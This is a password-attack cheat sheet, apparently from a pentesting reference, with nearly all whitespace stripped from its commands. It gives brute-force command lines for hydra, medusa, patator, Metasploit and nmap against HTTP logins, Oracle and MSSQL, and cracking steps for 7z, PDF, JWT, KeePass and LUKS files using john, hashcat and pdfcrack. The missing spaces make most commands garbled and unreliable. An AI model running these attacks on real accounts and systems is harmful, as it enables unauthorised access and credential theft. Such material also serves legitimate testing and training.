Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
Crunch
crunch460123456789ABCDEF-ocrunch1.txt#From length 4 to 6 using that alphabetcrunch44-f/usr/share/crunch/charset.lstmixalpha# Only length 4 using charset mixalpha (inside file charset.lst)@Lowercasealphacharacters,Uppercasealphacharacters%Numericcharacters^Specialcharactersincludingspaccrunch68-t,@@^^%%
hydra-L/usr/share/brutex/wordlists/simple-users.txt-P/usr/share/brutex/wordlists/password.lstsizzle.htb.localhttp-get/certsrv/# Use https-get mode for httpSmedusa-h<IP>-u<username>-P<passwords.txt>-Mhttp-mDIR:/path/to/auth-T10
HTTP - Post Form
hydra-L/usr/share/brutex/wordlists/simple-users.txt-P/usr/share/brutex/wordlists/password.lstdomain.htbhttp-post-form"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect"-V# Use https-post-form mode for httpS
For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
patatororacle_loginsid=<SID>host=<IP>user=FILE0password=FILE10=users-oracle.txt1=pass-oracle.txt-xignore:code=ORA-01017./odat.pypasswordguesser-s $SERVER -d $SID./odat.pypasswordguesser-s $MYSERVER -p $PORT --accounts-fileaccounts_multiple.txt#msf1msf> useadmin/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORT1521msf> setSID<SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf> usescanner/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORTS1521msf> setSID<SID>#nmap fails sometimes for some reson executing this scriptnmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=<SID><IP>
In order to use oracle_login with patator you need to install:
#Use the NetBIOS name of the machine as domaincrackmapexecmssql<IP>-d<DomainName>-uusernames.txt-ppasswords.txthydra-L/root/Desktop/user.txt–P/root/Desktop/pass.txt<IP>mssqlmedusa-h<IP>–U/root/Desktop/user.txt–P/root/Desktop/pass.txt–Mmssqlnmap-p1433--scriptms-sql-brute--script-argsmssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts<host>#Use domain if needed. Be carefull with the number of password in the list, this could block accountsmsf> useauxiliary/scanner/mssql/mssql_login#Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
#Download and install requirements for 7z2johnwgethttps://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.plapt-getinstalllibcompress-raw-lzma-perl./7z2john.plfile.7z>7zhash.john
PDF
apt-getinstallpdfcrackpdfcrackencrypted.pdf-w/usr/share/wordlists/rockyou.txt#pdf2john didnt worked well, john didnt know which hash type was# To permanently decrypt the pdfsudoapt-getinstallqpdfqpdf--password=<PASSWORD>--decryptencrypted.pdfplaintext.pdf
JWT
gitclonehttps://github.com/Sjord/jwtcrack.gitcdjwtcrack#Bruteforce using crackjwt.pypythoncrackjwt.pyeyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc/usr/share/wordlists/rockyou.txt#Bruteforce using johnpythonjwt2john.pyeyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc>jwt.johnjohnjwt.john#It does not work with Kali-John
sudoapt-getinstall-ykpcli#Install keepass tools like keepass2johnkeepass2johnfile.kdbx>hash#The keepass is only using passwordkeepass2john-k<file-password>file.kdbx>hash# The keepas is also using a file as a needed credential#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2johnjohn--wordlist=/usr/share/wordlists/rockyou.txthash
bruteforce-luks-f./list.txt./backup.imgcryptsetupluksOpenbackup.imgmylucksopenls/dev/mapper/#You should find here the image mylucksopenmount/dev/mapper/mylucksopen/mnt
Method 2
cryptsetupluksDumpbackup.img#Check that the payload offset is set to 4096ddif=backup.imgof=luckshashbs=512count=4097#Payload offset +1hashcat-m14600-a0luckshashwordlists/rockyou.txtcryptsetupluksOpenbackup.imgmylucksopenls/dev/mapper/#You should find here the image mylucksopenmount/dev/mapper/mylucksopen/mnt